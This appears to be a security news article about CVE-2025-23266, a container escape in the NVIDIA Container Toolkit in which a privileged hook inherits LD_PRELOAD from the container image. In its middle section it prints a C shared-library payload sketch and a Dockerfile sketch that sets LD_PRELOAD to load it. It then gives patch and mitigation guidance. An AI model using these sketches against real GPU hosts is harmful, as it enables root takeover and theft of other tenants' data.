A critical security flaw in the NVIDIA Container Toolkit (NCT), the foundational software powering many cloud-based AI and GPU services, has been disclosed by Wiz Research, raising alarm across the AI and cloud computing sectors.
The vulnerability, now tracked as CVE-2025-23266 and carrying a CVSS score of 9.0 (Critical), enables an attacker running inside a container to escape isolation controls and seize full root access on the host machine.
The attack boils down to a subtle but impactful flaw in how the toolkit handles OCI hooks, and researchers have demonstrated that it can be exploited with little more than a three-line Dockerfile.
Systemic Risk to Cloud AI Infrastructure
The NVIDIA Container Toolkit gives containerized workloads access to GPU hardware and plays a pivotal role in the managed AI services offered by every major cloud provider, including environments where customers run their own containerized AI workloads on shared hardware.
The risk is particularly acute in multi-tenant services: a malicious customer could build a container image engineered to exploit CVE-2025-23266, break out of the container, and gain root privileges on the host node.

This breach would grant attackers potential access to sensitive data, proprietary models, and the workloads of all other tenants on the same hardware, a threat vector with the potential to destabilize large-scale AI offerings globally.
Wiz Research’s technical analysis reveals that the vulnerability pivots on the interaction of OCI “createContainer” hooks with environment variables that are inherited from the container image, contrary to common secure engineering assumptions.
The NVIDIA toolkit’s privileged createContainer hook, designed to configure GPU access before a container launches, inappropriately inherits values such as LD_PRELOAD from untrusted containers.
By placing a malicious shared object inside the container image and setting LD_PRELOAD to load it, the attacker ensures that when the container is created, the privileged NVIDIA hook loads their library and runs their code with root-level host permissions.
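To make the mechanism concrete (this is not the Wiz proof of concept itself), the following is a minimal sketch of what a generic LD_PRELOAD payload looks like: a shared library whose constructor runs automatically in any process that loads it, so a privileged hook that inherits LD_PRELOAD would execute this code with its own (root) privileges. The file names and the demonstration action are illustrative assumptions.

```c
/* evil.c -- illustrative sketch of a generic LD_PRELOAD payload, not the
 * published exploit. Build with: gcc -shared -fPIC -o evil.so evil.c */
#include <stdio.h>
#include <unistd.h>

/* The constructor runs automatically whenever a dynamically linked program
 * loads this library via LD_PRELOAD. */
__attribute__((constructor))
static void init(void)
{
    /* Hypothetical demonstration action: record which process loaded the
     * library and under which effective UID. A real attacker could run any
     * code here with the privileges of the hijacked process. */
    FILE *f = fopen("/tmp/ldpreload_poc.txt", "a");
    if (f != NULL) {
        fprintf(f, "loaded into pid %d as uid %d\n",
                (int)getpid(), (int)geteuid());
        fclose(f);
    }
}
```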
CVE-2025-23266 Disclosure
The proof-of-concept exploit underscoring the severity of the bug consists of a minimalist Dockerfile: importing a benign-looking base image, setting the LD_PRELOAD environment variable, and copying in a crafted shared object.
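A hedged sketch of such a Dockerfile, following the three-step structure described above, could look like the following; the base image, library filename, and destination path are assumptions for illustration, not the published exploit.

```dockerfile
# Illustrative sketch only -- image name, payload filename, and path are
# assumptions mirroring the structure described in the disclosure.
FROM busybox
# The crafted shared object built by the attacker (see the C sketch above).
COPY evil.so /evil.so
# On vulnerable toolkit versions, this value is inherited by the privileged
# createContainer hook that configures GPU access.
ENV LD_PRELOAD=/evil.so
```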
When a user runs such a container with vulnerable toolkit versions (up to and including NCT v1.17.7, or in CDI mode for versions prior to v1.17.5, as well as GPU Operator up to 25.3.1), the NVIDIA “nvidia-ctk” process is subverted, resulting in a full host escape.
The payload can then perform any action as root, such as exfiltrating local data or implanting persistent malware. NVIDIA has responded swiftly, issuing patches and detailed mitigation steps.
Organizations are urged to immediately upgrade to the latest NVIDIA Container Toolkit and GPU Operator releases, as recommended in NVIDIA’s coordinated security bulletin.
For those unable to update promptly, a temporary mitigation is to disable the “enable-cuda-compat” hook, either through the toolkit’s configuration file or, for Kubernetes clusters, by setting the appropriate environment variables in the GPU Operator Helm chart.
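As a rough illustration of the configuration-file route, the workaround could look something like the excerpt below; the feature-flag name and file location shown here are assumptions, so verify the exact key and path against NVIDIA’s security bulletin before relying on this setting.

```toml
# Excerpt from the NVIDIA Container Toolkit config.toml (sketch only; the
# key name and section are assumptions -- consult NVIDIA's bulletin for the
# authoritative mitigation settings).
[features]
disable-cuda-compat-lib-hook = true
```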
Additionally, organizations are advised to inventory their environments to identify all potentially vulnerable systems, especially those running containers built from untrusted or public images. Wiz Research underscores that internet exposure is not the critical attack vector here.
Rather, the principal risk surfaces wherever users can run arbitrary container images, whether through social engineering of developers, compromised supply chains, or workflows that allow importing external workloads.
The release hammers home that, as the AI industry races forward, the most immediate security threats are rooted in core infrastructure and supply chain weaknesses, not in speculative, futuristic AI-driven attacks.
The researchers call for a mature and vigilant approach to the security of AI infrastructure, built on tight collaboration between security and engineering teams and rigorous scrutiny of the provenance of all software in the AI stack.